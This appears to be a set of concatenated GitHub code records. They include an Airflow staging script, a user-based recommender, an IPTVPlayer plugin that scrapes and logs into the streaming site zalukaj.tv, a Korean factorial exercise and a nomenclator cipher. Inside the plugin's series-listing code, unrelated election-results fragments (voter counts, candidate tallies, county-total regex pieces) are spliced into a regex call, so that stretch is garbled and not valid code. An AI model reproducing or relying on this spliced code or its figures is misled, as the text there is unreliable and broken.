%s \" % filepath)\n return None\n\n# ----------------------------------------------------- #\n# * Move to directory\n# ----------------------------------------------------- #\ndef moveto(src_filepath:str, src_base:str, dest_base:str, method:str) -> str:\n \"\"\"\n Move files from one stage to another, then update local request record.\n\n Parameters\n -----------\n\n src_filepath: str, source file path\n src_base: str, directory to be replaced\n dest_base: str, directory to be used as replacement to modify the destination directory.\n\n \"\"\"\n try:\n # create destination path\n dest_filepath = src_filepath.replace(src_base, dest_base)\n\n # check if file exists\n if len(glob(src_filepath)) < 1: \n logging.info(f\"[skip] There is nothing to move in: '{src_filepath}'.\")\n return dest_filepath\n \n # get filename, path\n fn = dest_filepath.split('/')[-1]\n path = dest_filepath.replace(fn,'')\n \n # get request df filepath, modify state value\n req_fn = f\"{REQUESTS_DIR}/{fn.replace('.grib','.csv')}\"\n req_df = pd.read_csv(req_fn)\n req_df['state'] = method\n \n # move file\n mkdir(path)\n move(src_filepath, dest_filepath)\n \n # -- disabled to enable date based batch processing in future\n # src_dir = src_filepath.replace(fn,'') \n # rmtree(src_dir)\n \n # save state\n req_df.to_csv(req_fn, index=False)\n mes=f\"[{method}] file {fn} successfully {method}!\"\n logging.info(mes)\n\n return dest_filepath\n except Exception as e:\n raise Exception(e)\n\n# ----------------------------------------------------- #\n# * Move to staging directory\n# ----------------------------------------------------- #\ndef moveto_staged(filepath: str):\n # move file\n dest_filepath = moveto(src_filepath=filepath, src_base=EXTRACT_GRIB_DIR, \n dest_base=STAGED_GRIB_DIR, method='staged')\n # return filepath\n return dest_filepath\n\n\n\n","repo_name":"Kui-03/farm-nav","sub_path":"dags/scripts/staging.py","file_name":"staging.py","file_ext":"py","file_size_in_byte":3325,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"19"} +{"seq_id":"38433006826","text":"import math\nimport tool\n\ndef userSimilarity(train):\n item_users = dict()\n print(\"生成物品-用户倒排表...\")\n for user, items in train.items():\n for i in items:\n if i not in item_users:\n item_users[i] = set()\n item_users[i].add(user)\n C = dict()\n N = dict()\n print(\"建立相似度矩阵...\")\n item_usersNum = len(item_users)\n usern = 1\n for users in item_users.values():\n print(\"\\r%d/%d\" % (usern, item_usersNum), end=\"\")\n usern += 1\n for u in users:\n if u not in N:\n N[u] = 0\n N[u] += 1\n for v in users:\n if u != v:\n if u not in C:\n C[u] = dict()\n if v not in C[u]:\n C[u][v] = 0\n C[u][v] += 1 / math.log(1 + len(users))\n print(\"\\n计算用户兴趣相似度...\")\n for u, row in C.items():\n for v, cuv in row.items():\n C[u][v] = cuv / math.sqrt(N[u]*N[v])\n sorted_user_sim = {k: sorted(v.items(), key=lambda x: x[1], reverse=True) for k, v in C.items()}\n return sorted_user_sim\n\n# 注意相似用户和推荐物品都是取排名靠前的item,不然就太多���\ndef recommend(user, train, W, userN, itemN):\n rank = dict()\n if user not in W or user not in train:\n return rank\n interacted_items = train[user]\n for v, wuv in W[user][:userN]:\n for vItem in train[v]:\n if vItem not in interacted_items:\n if vItem not in rank:\n rank[vItem] = 0\n rank[vItem] += wuv * 1\n recs = list(sorted(rank.items(), key=lambda x: x[1], reverse=True))[:itemN]\n return recs\n\ndef userCF(userN, itemN, dataScale):\n print(\"加载数据...\")\n train, test = tool.splitData(dataScale, 8, 0)\n rankList 
= dict()\n    W = userSimilarity(train)\n    print(\"Generating recommendations...\")\n    # recommend for every user in the test set\n    for user in test.keys():\n        rankList[user] = recommend(user, train, W, userN, itemN)\n    print(\"Evaluating...\")\n    eva = tool.Evaluator(train, test, rankList, userN, dataScale)\n    eva.show()\n\n# userN, itemN, dataScale\n# take the top userN similar users and top itemN recommended items; use a dataScale fraction of the data\nuserCF(80, 10, 0.1)\n#dataScale: 0.1 topN: 8 precision: 0.003925417075564278 recall: 0.012327773749093546 coverage: 0.7647241165530069 popularity: 4.132750171483042\n#dataScale: 0.2 topN: 8 precision: 0.009711165756679031 recall: 0.021062146892655367 coverage: 0.7249124854142357 popularity: 4.988955540712396\n#dataScale: 0.2 topN: 80 precision: 0.016363636363636365 recall: 0.035796610169491525 coverage: 0.23561882626380012 popularity: 5.793893530988032\n#dataScale: 0.5 topN: 80 precision: 0.05416666666666667 recall: 0.05580405454151937 coverage: 0.18857459789240155 popularity: 6.717603555313228\n","repo_name":"ChrisCN97/Recommend-System-Practice-Code-Note","sub_path":"Chapter2/userCF.py","file_name":"userCF.py","file_ext":"py","file_size_in_byte":2876,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"19"}
+{"seq_id":"36283613532","text":"# -*- coding: utf-8 -*-\n\n###################################################\n# LOCAL import\n###################################################\nfrom Plugins.Extensions.IPTVPlayer.components.ihost import IHost, CDisplayListItem, RetHost, CUrlItem\nfrom Plugins.Extensions.IPTVPlayer.libs.pCommon import common, CParsingHelper\nfrom Plugins.Extensions.IPTVPlayer.libs.urlparser import urlparser\n\nfrom Plugins.Extensions.IPTVPlayer.tools.iptvtools import printDBG, CSearchHistoryHelper, GetLogoDir, GetCookieDir\nfrom Plugins.Extensions.IPTVPlayer.libs.youtube_dl.utils import clean_html\n\n###################################################\n# FOREIGN import\n###################################################\nimport re, urllib, urllib2, base64, math \ntry:\n    import simplejson\nexcept:\n    import json as simplejson \nfrom Components.config import config, ConfigYesNo, ConfigText, getConfigListEntry\n\n###################################################\n# E2 GUI COMPONENTS \n###################################################\nfrom Plugins.Extensions.IPTVPlayer.components.asynccall import MainSessionWrapper\nfrom Screens.MessageBox import MessageBox\n\n###################################################\n# Config options for HOST\n###################################################\nconfig.plugins.iptvplayer.zalukajtvPREMIUM = ConfigYesNo(default = False)\nconfig.plugins.iptvplayer.zalukajtv_login = ConfigText(default = \"\", fixed_size = False)\nconfig.plugins.iptvplayer.zalukajtv_password = ConfigText(default = \"\", fixed_size = False)\n\ndef GetConfigList():\n    optionList = []\n    optionList.append(getConfigListEntry(\"Zalukaj.TV PREMIUM user?\", config.plugins.iptvplayer.zalukajtvPREMIUM))\n    if config.plugins.iptvplayer.zalukajtvPREMIUM.value:\n        optionList.append(getConfigListEntry(\"    Zalukaj.TV login:\", config.plugins.iptvplayer.zalukajtv_login))\n        optionList.append(getConfigListEntry(\"    Zalukaj.TV password:\", config.plugins.iptvplayer.zalukajtv_password)) \n    return optionList\n\n###################################################\n# Title of HOST\n###################################################\ndef gettytul():\n    return 'Zalukaj.tv'\n\n###################################################\n# class IPTVHost\n###################################################\nclass IPTVHost(IHost):\n    
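# (added note) thin GUI adapter around Host below: keeps a navigation back-stack\n    # in prevIndex/prevList so getPrevList can restore earlier menu levels\n    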
LOGO_NAME = 'zalukajtvlogo.png'\n\n def __init__(self):\n printDBG( \"init begin\" )\n self.host = Host()\n self.prevIndex = []\n self.currList = []\n self.prevList = []\n printDBG( \"init end\" )\n \n def isProtectedByPinCode(self):\n return False\n \n def getLogoPath(self): \n return RetHost(RetHost.OK, value = [ GetLogoDir( self.LOGO_NAME ) ])\n\n def getInitList(self):\n printDBG( \"getInitList begin\" )\n self.prevIndex = []\n self.currList = self.host.getInitList()\n self.host.setCurrList(self.currList)\n self.prevList = []\n printDBG( \"getInitList end\" )\n return RetHost(RetHost.OK, value = self.currList)\n\n def getListForItem(self, Index = 0, refresh = 0, selItem = None):\n printDBG( \"getListForItem begin\" )\n self.prevIndex.append(Index)\n self.prevList.append(self.currList)\n self.currList = self.host.getListForItem(Index, refresh, selItem)\n #self.currList = [ self.prevList[-1][Index] ]\n printDBG( \"getListForItem end\" )\n return RetHost(RetHost.OK, value = self.currList)\n\n def getPrevList(self, refresh = 0):\n printDBG( \"getPrevList begin\" )\n if(len(self.prevList) > 0):\n self.prevIndex.pop()\n self.currList = self.prevList.pop()\n self.host.setCurrList(self.currList)\n printDBG( \"getPrevList end OK\" )\n return RetHost(RetHost.OK, value = self.currList)\n else:\n printDBG( \"getPrevList end ERROR\" )\n return RetHost(RetHost.ERROR, value = [])\n\n def getCurrentList(self, refresh = 0):\n printDBG( \"getCurrentList begin\" )\n #if refresh == 1\n #self.prevIndex[-1] #ostatni element prevIndex\n #self.prevList[-1] #ostatni element prevList\n #tu pobranie listy dla dla elementu self.prevIndex[-1] z listy self.prevList[-1] \n printDBG( \"getCurrentList end\" )\n return RetHost(RetHost.OK, value = self.currList)\n\n def getLinksForVideo(self, Index = 0, item = None):\n return RetHost(RetHost.NOT_IMPLEMENTED, value = [])\n \n def getResolvedURL(self, url):\n printDBG( \"getResolvedURL begin\" )\n if url != None and url != '': \n ret = self.host.getResolvedURL(url)\n if ret != None and ret != '': \n printDBG( \"getResolvedURL ret: \"+ret)\n list = []\n list.append(ret)\n printDBG( \"getResolvedURL end OK\" )\n return RetHost(RetHost.OK, value = list)\n else:\n printDBG( \"getResolvedURL end\" )\n return RetHost(RetHost.NOT_IMPLEMENTED, value = []) \n else:\n printDBG( \"getResolvedURL end\" )\n return RetHost(RetHost.NOT_IMPLEMENTED, value = [])\n\n def getSearchResults(self, pattern, searchType = None):\n printDBG( \"getSearchResults begin\" )\n printDBG( \"getSearchResults pattern: \" +pattern)\n self.prevIndex.append(0)\n self.prevList.append(self.currList)\n self.currList = self.host.getSearchResults(pattern, searchType)\n printDBG( \"getSearchResults end\" )\n return RetHost(RetHost.OK, value = self.currList)\n\n###################################################\n# class HOST\n###################################################\nclass Host:\n currList = []\n MAIN_URL = ''\n PREMIUM = False\n konto = ''\n HOST = 'Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.9.2.18) Gecko/20110621 Mandriva Linux/1.9.2.18-0.1mdv2010.2 (2010.2) Firefox/3.6.18'\n\n def __init__(self):\n printDBG( 'Host __init__ begin' )\n self.exSession = MainSessionWrapper()\n self.COOKIEFILE = GetCookieDir('zalukajtv.cookie')\n self.cm = common()\n self.up = urlparser()\n self.history = CSearchHistoryHelper('wspolne')\n self.currList = []\n printDBG( 'Host __init__ end' )\n \n def setCurrList(self, list):\n printDBG( 'Host setCurrList begin' )\n self.currList = list\n printDBG( 'Host setCurrList end' 
)\n return \n \n def fullUrl(self, phUrl):\n if not phUrl.startswith('http'):\n if '/' == phUrl[0]:\n phUrl = '/' + phUrl\n phUrl = self.MAIN_URL + phUrl\n return phUrl\n\n def getInitList(self):\n printDBG( 'Host getInitList begin' )\n ####################################\n # logowanie\n ####################################\n if config.plugins.iptvplayer.zalukajtvPREMIUM.value:\n url = 'http://zalukaj.tv/account.php'\n try: data = self.cm.getURLRequestData({ 'url': url, 'use_host': True, 'host': self.HOST, 'use_cookie': True, 'save_cookie': True, 'load_cookie': False, 'cookiefile': self.COOKIEFILE, 'use_post': True, 'return_data': True },{'login': config.plugins.iptvplayer.zalukajtv_login.value, 'password': config.plugins.iptvplayer.zalukajtv_password.value})\n except:\n printDBG( 'Host getInitList query error' )\n printDBG( 'Host getInitList query error url:'+url )\n printDBG( 'Host getInitList query error: Uzywam Player z limitami')\n data = None\n if data:\n self.PREMIUM = True\n printDBG( 'Host getInitList: chyba zalogowano do premium...' )\n url = 'http://zalukaj.tv/libs/ajax/login.php?login=1'\n try: \n data = self.cm.getURLRequestData({ 'url': url, 'use_host': True, 'host': self.HOST, 'use_cookie': True, 'save_cookie': False, 'load_cookie': True, 'cookiefile': self.COOKIEFILE, 'use_post': False, 'return_data': True })\n printDBG( 'Host listsItems data: '+data )\n parse = re.search('Typ Konta:.*?>(.*?)<.*?>(.*?)<', data, re.S)\n if parse:\n self.konto = '- Typ Konta: '+parse.group(1)+parse.group(2)\n else: \n self.konto = ''\n except:\n printDBG( 'Host getInitList: blad pobrania danych o koncie premium' )\n \n if '' == self.konto:\n self.exSession.open(MessageBox, 'Problem z zalogowaniem użytkownika \\n\"%s\" jako VIP.' % config.plugins.iptvplayer.zalukajtv_login.value, type = MessageBox.TYPE_INFO, timeout = 10)\n\n #if 'Wyloguj' in data:\n # self.PREMIUM = True \n # printDBG('Host getInitList:' + config.plugins.iptvplayer.zalukajtv_login.value + ', Zostales poprawnie zalogowany')\n #else:\n # printDBG('Host getInitList: Blad logowania, uzywam Player z limitami')\n ####################################\n self.currList = self.listsItems(-1, '', 'main-menu')\n printDBG( 'Host getInitList end' )\n return self.currList\n\n def getListForItem(self, Index = 0, refresh = 0, selItem = None):\n printDBG( 'Host getListForItem begin' )\n valTab = []\n if len(self.currList[Index].urlItems) == 0:\n return valTab\n valTab = self.listsItems(Index, self.currList[Index].urlItems[0], self.currList[Index].urlSeparateRequest)\n self.currList = valTab\n printDBG( 'Host getListForItem end' )\n return self.currList\n\n def getSearchResults(self, pattern, searchType = None):\n printDBG( \"Host getSearchResults begin\" )\n printDBG( \"Host getSearchResults pattern: \" +pattern)\n valTab = []\n valTab = self.listsItems(-1, pattern, 'search')\n #valTab = [] #test \n self.currList = valTab\n printDBG( \"Host getSearchResults end\" )\n return self.currList\n\n def listsItems(self, Index, url, name = ''):\n printDBG( 'Host listsItems begin' )\n printDBG( 'Host listsItems url: '+url )\n valTab = []\n if name == 'main-menu':\n printDBG( 'Host listsItems begin name='+name )\n self.MAIN_URL = 'http://zalukaj.tv'\n valTab.append(CDisplayListItem('Filmy '+self.konto, 'http://zalukaj.tv', CDisplayListItem.TYPE_CATEGORY, ['http://zalukaj.tv/'], 'filmy', '', None)) \n valTab.append(CDisplayListItem('Seriale', 'http://zalukaj.tv/seriale', CDisplayListItem.TYPE_CATEGORY, ['http://zalukaj.tv/seriale'], 'seriale', '', None)) 
\n valTab.append(CDisplayListItem('Szukaj', 'Szukaj filmów', CDisplayListItem.TYPE_SEARCH, ['http://szukaj.zalukaj.tv/szukaj'], 'seriale', '', None)) \n valTab.append(CDisplayListItem('Historia wyszukiwania', 'Historia wyszukiwania', CDisplayListItem.TYPE_CATEGORY, ['http://zalukaj.tv/seriale'], 'history', '', None)) \n printDBG( 'Host listsItems end' )\n return valTab\n\n # ########## #\n if 'history' == name:\n printDBG( 'Host listsItems begin name='+name )\n for histItem in self.history.getHistoryList():\n valTab.append(CDisplayListItem(histItem['pattern'], 'Szukaj ', CDisplayListItem.TYPE_CATEGORY, [histItem['pattern'],histItem['type']], 'search', '', None)) \n printDBG( 'Host listsItems end' )\n return valTab\n \n # ########## #\n if 'search' == name:\n printDBG( 'Host listsItems begin name='+name )\n pattern = url \n if Index==-1: \n self.history.addHistoryItem( pattern, 'video')\n url = 'http://k.zalukaj.tv/szukaj'\n try: data = self.cm.getURLRequestData({ 'url': url, 'use_host': False, 'use_cookie': False, 'use_post': True, 'return_data': True },{'searchinput': pattern})\n except:\n printDBG( 'Host listsItems query error' )\n printDBG( 'Host listsItems query error url:'+url )\n return valTab\n #printDBG( 'Host listsItems data: '+data )\n phMovies = re.findall('class=\"tivief4\".*?src=\"(.*?)\".*?(.*?)<.*?class=\"few_more\">(.*?)<', data, re.S)\n if phMovies:\n for (phImage, phUrl, phTitle, phDescr, phMore) in phMovies:\n printDBG( 'Host listsItems phImage: ' +phImage )\n printDBG( 'Host listsItems phUrl: ' +phUrl )\n printDBG( 'Host listsItems phTitle: ' +phTitle )\n printDBG( 'Host listsItems phDescr: ' +phDescr )\n printDBG( 'Host listsItems phMore: ' +phMore )\n valTab.append(CDisplayListItem(phTitle, phMore+' | '+decodeHtml(phDescr), CDisplayListItem.TYPE_VIDEO, [CUrlItem('', phUrl, 1)], 0, phImage, None)) \n printDBG( 'Host listsItems end' )\n return valTab\n \n # ########## #\n if 'seriale' == name:\n printDBG( 'Host listsItems begin name='+name )\n self.MAIN_URL = 'http://zalukaj.tv' \n try: data = self.cm.getURLRequestData({ 'url': url, 'use_host': False, 'use_cookie': False, 'use_post': False, 'return_data': True })\n except:\n printDBG( 'Host listsItems query error' )\n printDBG( 'Host listsItems query error url:'+url )\n return valTab\n #printDBG( 'Host listsItems data: '+data )\n parse = re.search('
    ', data, re.S)\n if not parse: return ''\n phMovies = re.findall('
    Registered voters 53,662Registered voters 41,604Steve Zorn (DEM) (Write-In) 10Kara Leach Palfy (REP) (Write-In)352Hans V. Romer (LIB) 5,112(?:)?{col_title}(?:\\s)?(?:)?{digits}(?:)?County Total(?:)?County (?:)?([\\w\\s]+)(?:)?Total(?:)?([\\w\\s]+)(?:)?Total 2,087Jay Geyer (IND) 2,087Daneya Esgar (DEM) 20,556Daneya Esgar (DEM) 20,556(.*?)<', data, re.S)\n if phMovies:\n for (phUrl, phTitle) in phMovies:\n printDBG( 'Host listsItems phUrl: ' +phUrl )\n printDBG( 'Host listsItems phTitle: '+phTitle )\n valTab.append(CDisplayListItem(phTitle, phTitle, CDisplayListItem.TYPE_CATEGORY, [self.fullUrl(phUrl)], 'seriale-sezon', phImage, None)) \n printDBG( 'Host listsItems end' )\n return valTab\n if 'seriale-sezon' == name:\n printDBG( 'Host listsItems begin name='+name )\n self.MAIN_URL = 'http://zalukaj.tv' \n try: data = self.cm.getURLRequestData({ 'url': url, 'use_host': False, 'use_cookie': False, 'use_post': False, 'return_data': True })\n except:\n printDBG( 'Host listsItems query error' )\n printDBG( 'Host listsItems query error url:'+url )\n return valTab\n #printDBG( 'Host listsItems data: '+data )\n phImage = ''\n parse = re.search('(.*?)<.*?href=\"(.*?)\" title=\"(.*?)\"', data, re.S)\n if phMovies:\n for (phEpisode, phUrl, phTitle) in phMovies:\n printDBG( 'Host listsItems phEpizod: ' +phEpisode )\n printDBG( 'Host listsItems phUrl: ' +phUrl )\n printDBG( 'Host listsItems phTitle: '+phTitle )\n valTab.append(CDisplayListItem(phEpisode+' - '+phTitle, phTitle, CDisplayListItem.TYPE_VIDEO, [CUrlItem('', self.fullUrl(phUrl), 1)], 0, phImage, None)) \n printDBG( 'Host listsItems end' )\n return valTab\n if 'filmy' == name:\n printDBG( 'Host listsItems begin name='+name )\n self.MAIN_URL = 'http://zalukaj.tv' \n try: data = self.cm.getURLRequestData({ 'url': url, 'use_host': False, 'use_cookie': False, 'use_post': False, 'return_data': True })\n except:\n printDBG( 'Host listsItems query error' )\n printDBG( 'Host listsItems query error url:'+url )\n return valTab\n #printDBG( 'Host listsItems data: '+data )\n sts,parse = CParsingHelper.getDataBeetwenMarkers(data, '', False)\n phMovies = re.findall('
    ([^<]+?)', parse, re.S)\n if phMovies:\n for (phUrl, phTitle) in phMovies:\n printDBG( 'Host listsItems phUrl: ' + phUrl )\n printDBG( 'Host listsItems phTitle: ' + phTitle )\n valTab.append(CDisplayListItem(phTitle, phTitle, CDisplayListItem.TYPE_CATEGORY, [ self.fullUrl(phUrl) ], 'filmy-clip', '', None)) \n #valTab.insert(0,CDisplayListItem('--Najpopularniejsze--', 'Najpopularniejsze wyswietlenia-miesiac', CDisplayListItem.TYPE_CATEGORY, ['http://zalukaj.tv/#wyswietlenia-miesiac'], 'filmy-last', '', None)) \n #valTab.insert(0,CDisplayListItem('--Ostatnio oglądane--', 'Ostatnio oglądane', CDisplayListItem.TYPE_CATEGORY, ['http://zalukaj.tv/#lastseen'], 'filmy-last', '', None)) \n valTab.insert(0,CDisplayListItem('--Ostatnio dodane--', 'Ostatnio dodane', CDisplayListItem.TYPE_CATEGORY, ['http://zalukaj.tv'], 'filmy-last', '', None)) \n printDBG( 'Host listsItems end' )\n return valTab\n if 'filmy-clip' == name:\n printDBG( 'Host listsItems begin name='+name )\n self.MAIN_URL = 'http://zalukaj.tv' \n try: data = self.cm.getURLRequestData({ 'url': url, 'use_host': False, 'use_cookie': False, 'use_post': False, 'return_data': True })\n except:\n printDBG( 'Host listsItems query error' )\n printDBG( 'Host listsItems query error url:'+url )\n return valTab\n #printDBG( 'Host listsItems data: '+data )\n phMovies = re.findall('background-image:url(.*?);\">

    (.*?).*?

    (.*?)<.*?\">(.*?)<.*?class=\"few_more\">(.*?)<', data, re.S)\n if phMovies:\n for (phImage, phRok, phUrl, phTitle, phDescr, phMore) in phMovies:\n printDBG( 'Host listsItems phImage: ' +phImage )\n printDBG( 'Host listsItems phRok: ' +phRok )\n printDBG( 'Host listsItems phUrl: ' +phUrl )\n printDBG( 'Host listsItems phTitle: ' +phTitle )\n printDBG( 'Host listsItems phDescr: ' +phDescr )\n printDBG( 'Host listsItems phMore: ' +phMore )\n valTab.append(CDisplayListItem(phTitle, phRok+' | '+phMore+' | '+decodeHtml(phDescr), CDisplayListItem.TYPE_VIDEO, [CUrlItem('', phUrl, 1)], 0, phImage[1:-1], None)) \n match = re.findall('class=\"pc_current\">.*?href=\"(.*?)\">(.*?)<', data, re.S)\n if match: \n phUrl = match[-1][0]\n phTitle = match[-1][1]\n valTab.append(CDisplayListItem('Strona '+phTitle, 'Strona: '+phUrl, CDisplayListItem.TYPE_CATEGORY, [self.fullUrl(phUrl)], name, '', None)) \n printDBG( 'Host listsItems end' )\n return valTab\n if 'filmy-last' == name:\n printDBG( 'Host listsItems begin name='+name )\n self.MAIN_URL = 'http://zalukaj.tv' \n try: data = self.cm.getURLRequestData({ 'url': url, 'use_host': False, 'use_cookie': False, 'use_post': False, 'return_data': True })\n except:\n printDBG( 'Host listsItems query error' )\n printDBG( 'Host listsItems query error url:'+url )\n return valTab\n #printDBG( 'Host listsItems data: '+data )\n phMovies = re.findall('class=\"tivief4\".*?src=\"(.*?)\".*?

    (.*?)<.*?\">(.*?)<.*?class=\"few_more\">(.*?)<', data, re.S)\n if phMovies:\n for (phImage, phUrl, phTitle, phDescr, phMore) in phMovies:\n printDBG( 'Host listsItems phImage: ' +phImage )\n printDBG( 'Host listsItems phUrl: ' +phUrl )\n printDBG( 'Host listsItems phTitle: ' +phTitle )\n printDBG( 'Host listsItems phDescr: ' +phDescr )\n printDBG( 'Host listsItems phMore: ' +phMore )\n valTab.append(CDisplayListItem(phTitle, phMore+' | '+decodeHtml(phDescr), CDisplayListItem.TYPE_VIDEO, [CUrlItem('', self.fullUrl(phUrl), 1)], 0, phImage, None)) \n printDBG( 'Host listsItems end' )\n return valTab\n\n return valTab\n\n def getResolvedURL(self, url):\n printDBG( 'Host getResolvedURL begin' )\n printDBG( 'Host getResolvedURL url: '+url )\n videoUrl = ''\n valTab = []\n \n if self.PREMIUM:\n sts, data = self.cm.getPage(url, {'use_host': True, 'host': self.HOST, 'use_cookie': True, 'save_cookie': False, 'load_cookie': True, 'cookiefile': self.COOKIEFILE})\n if sts:\n parse = re.search('/player.php.*?\"', data, re.S)\n if parse: \n printDBG( 'parse1p: '+parse.group(0) )\n url2 = self.fullUrl(parse.group(0))\n sts, data = self.cm.getPage(url2, {'use_host': True, 'host': self.HOST, 'use_cookie': True, 'save_cookie': False, 'load_cookie': True, 'cookiefile': self.COOKIEFILE, 'use_post': False, 'return_data': True })\n if sts:\n parse = re.search(' 0: \n printDBG( 'parse3p: PREMIUM: '+match[0] )\n linkvideo = match[0]\n return linkvideo\n else:\n printDBG( 'Host getResolvedURL query error premium' )\n printDBG( 'Host getResolvedURL query error premium url: '+url2 )\n else:\n printDBG( 'Host getResolvedURL query error premium' )\n printDBG( 'Host getResolvedURL query error premium url: '+url2 )\n else:\n printDBG( 'Host getResolvedURL query error premium' )\n printDBG( 'Host getResolvedURL query error premium url: '+url )\n \n if url[0:30] == 'http://zalukaj.tv/zalukaj-film' or url[0:31] == 'http://zalukaj.tv/serial-online': \n sts, data = self.cm.getPage(url)\n if not sts:\n printDBG( 'Host getResolvedURL query error' )\n printDBG( 'Host getResolvedURL query error url: '+url )\n return ''\n \n parse = re.search('/player.php.*?\"', data, re.S)\n if not parse: return '' \n printDBG( 'parse1: '+parse.group(0) )\n url2 = self.fullUrl(parse.group(0))\n sts, data = self.cm.getPage(url2)\n if not sts:\n printDBG( 'Host getResolvedURL query error' )\n printDBG( 'Host getResolvedURL query error url: '+ url2 )\n return ''\n parse = re.search('> \"))\n\nprint(sub_P24.fact(num)) # fact 함수로 num 팩토리얼을 계산해서 출력\n\n\n# sub 파일 이름 => sub_24로 고치기\ndef fact(n): # 입력받은 n을 매개변수로 하는 fact 함수\n\n factor = 1\n\n for i in range(n, 0, -1): # i가 n부터\n factor *= i # n! 구하기\n\n return factor\n\n\nif __name__ == \"__main__\": # 단일로 실행할 경우\n print(fact(5)) # 5!을 실행시켜 출력함\n","repo_name":"Alal11/University-assignments","sub_path":"[1-2] 파이선프로그래밍 (나웅수)/P-2-4.py","file_name":"P-2-4.py","file_ext":"py","file_size_in_byte":635,"program_lang":"python","lang":"ko","doc_type":"code","stars":0,"dataset":"github-code","pt":"19"} +{"seq_id":"21123055810","text":"import random\nimport numpy as np\nfrom RNG.LFSR import LFSR\nfrom RNG.FisherYates import fisherYatesShuffle\n\n# A nomenclator is a cipher that operates on common pieces of language in order\n# to defeat frequency analysis. The Great Cipher designed by Antoine Rossignol\n# for the French in the 1600s mostly used syllables. It also has special\n# symbols for distinctive words that showed up often like the names of various\n# generals. 
In fact syllables could be written using any of several \"code \n# groups\". \n# This variant is designed for modern English and rather than syllables it \n# uses common letter groups. So a code group could indicate four letters or\n# three or two or one. There are also \"nulls\" randomly inserted. These symbols\n# don't translate to anything and are meannt to be ignored. There is also a\n# supernull which means \"ignore this character and the character that comes\n# immediately after it\".\n# For every block of letters there are multiple code groups that can represent\n# it in order to make frequency analysis even more difficult.\n\n\ndef createCodeGroups(n,decode=False):\n \n # Generate the code groups. Note that there is a space in this so that the\n # code groups will be visibly separated when written out.\n codegroups = [\"{0:03} \".format(i) for i in range(1000)]\n \n \n # Use a LFSR to shuffle the code groups\n L = []\n for ctr,val in enumerate(LFSR(n,[5,6,8,9,11,15,19,31],32)):\n L.append(val)\n if ctr == 1000:\n break\n shuf = fisherYatesShuffle(1000,L)\n codegroups = [codegroups[i] for i in shuf]\n \n \n # There are a preposterously huge number of ways to shuffle the one thousand\n # code groups that exist. The 32 bit LFSR only provides about four billion\n # possible shuffles. While it can be operated by hand it isn't entirely\n # reasonable to pick a new key for every message. Fortunately nomenclator\n # type ciphers require a lot of text in order to mount an attack against them\n # and historically only had the key changed very rarely.\n \n # If working by hand isn't necessary a stronger modern algorithm can be used\n # to perform the shuffle.\n #random.seed(n)\n #random.shuffle(codegroups)\n # Now reset the random seed\n #random.seed()\n \n \n ## Our list of text symbols is taken from the Ngram data that we have\n ngrams1 = open('C:\\\\Users\\\\Alexander\\\\Documents\\\\GitHub\\\\ClassicCrypto\\\\NGrams\\\\1grams.csv', 'r')\n ngrams2 = open('C:\\\\Users\\\\Alexander\\\\Documents\\\\GitHub\\\\ClassicCrypto\\\\NGrams\\\\2grams.csv', 'r')\n ngrams3 = open('C:\\\\Users\\\\Alexander\\\\Documents\\\\GitHub\\\\ClassicCrypto\\\\NGrams\\\\3grams.csv', 'r')\n ngrams4 = open('C:\\\\Users\\\\Alexander\\\\Documents\\\\GitHub\\\\ClassicCrypto\\\\NGrams\\\\4grams.csv', 'r')\n \n codeDict = {}\n \n # Put letters and letter groups into the dictionary with each assigned to\n # a number that reflects how colmmon it is.\n for n,d in enumerate(ngrams1):\n L = d.split(\",\")\n codeDict[L[0]] = int(L[1])\n \n for n,d in enumerate(ngrams2):\n L = d.split(\",\")\n codeDict[L[0]] = int(L[1])\n if n > 50:\n break\n \n for n,d in enumerate(ngrams3):\n L = d.split(\",\")\n codeDict[L[0]] = int(L[1])\n if n > 40:\n break\n \n for n,d in enumerate(ngrams4):\n L = d.split(\",\")\n codeDict[L[0]] = int(L[1])\n if n > 30:\n break\n \n # Get the raw numbers into something more manageable. 
This is basically\n # arbitrary and could be done in a lot of ways.\n normalizingFactor = min(codeDict.values())//3\n for i in codeDict.items():\n codeDict[i[0]] = int(np.ceil(np.sqrt(i[1]//normalizingFactor)))\n # Put the supernulls and ordinary nulls into the list\n codeDict[\">\"] = 30\n codeDict[\"_\"] = 63\n\n\n # When encoding we go through the dictionary and replace the number N with\n # the next N code groups in the sorted list.\n # This way we can quickly lookup a sequence of symbols and find all the\n # codegroups that are used for it.\n if decode == False:\n for i in codeDict.items():\n L = []\n for j in range(i[1]):\n L.append(codegroups.pop())\n codeDict[i[0]] = L\n return codeDict\n \n # When decoding we make a new dictionary and for each item in the code\n # dictionary make N new entries from the sorted code groups.\n # This way we can quickly lookup a codegroup and get what it decodes as.\n if decode == True:\n decodeDict = {}\n for i in codeDict.items():\n for j in range(i[1]):\n decodeDict[codegroups.pop()] = i[0]\n return decodeDict\n \n\n\ndef nomenclator(text,key=1,decode=False,usenulls=True,dictionary=False,showgroups=False):\n \n D = createCodeGroups(key,decode)\n if dictionary == True:\n return D\n\n \n if decode == False:\n codegroups = [\"{0:03} \".format(i) for i in range(1000)]\n \n if usenulls == True:\n\n numNulls = len(text)//25\n\n ## Insert nulls to break up words\n for i in range(numNulls):\n r = random.randint(0,len(text))\n text = text[:r] + '_' + text[r:]\n \n for i in range(numNulls//3):\n r = random.randint(0,len(text))\n text = text[:r] + '>' + text[r:]\n \n # Replace the nulls\n while \"_\" in text:\n text = text.replace(\"_\",D[\"_\"][np.random.randint(0,63)],1)\n \n while \">\" in text:\n gr = random.choice(codegroups)\n text = text.replace(\">\",D[\">\"][np.random.randint(0,30)]+gr,1)\n \n # Starting with the longer ngrams replace \n for d in [i for i in D.keys() if len(i) == 4]:\n T = d.split(\",\")[0]\n ops = len(D[T]) \n while T in text:\n text = text.replace(T,D[T][np.random.randint(0,ops)],1)\n\n for d in [i for i in D.keys() if len(i) == 3]:\n T = d.split(\",\")[0]\n ops = len(D[T]) \n while T in text:\n text = text.replace(T,D[T][np.random.randint(0,ops)],1)\n \n for d in [i for i in D.keys() if len(i) == 2]:\n T = d.split(\",\")[0]\n ops = len(D[T]) \n while T in text:\n text = text.replace(T,D[T][np.random.randint(0,ops)],1)\n \n for d in [i for i in D.keys() if len(i) == 1]:\n T = d.split(\",\")[0]\n ops = len(D[T]) \n while T in text:\n text = text.replace(T,D[T][np.random.randint(0,ops)],1)\n \n \n return text\n \n if decode == True:\n X = text.split(\" \")\n X.pop()\n\n for 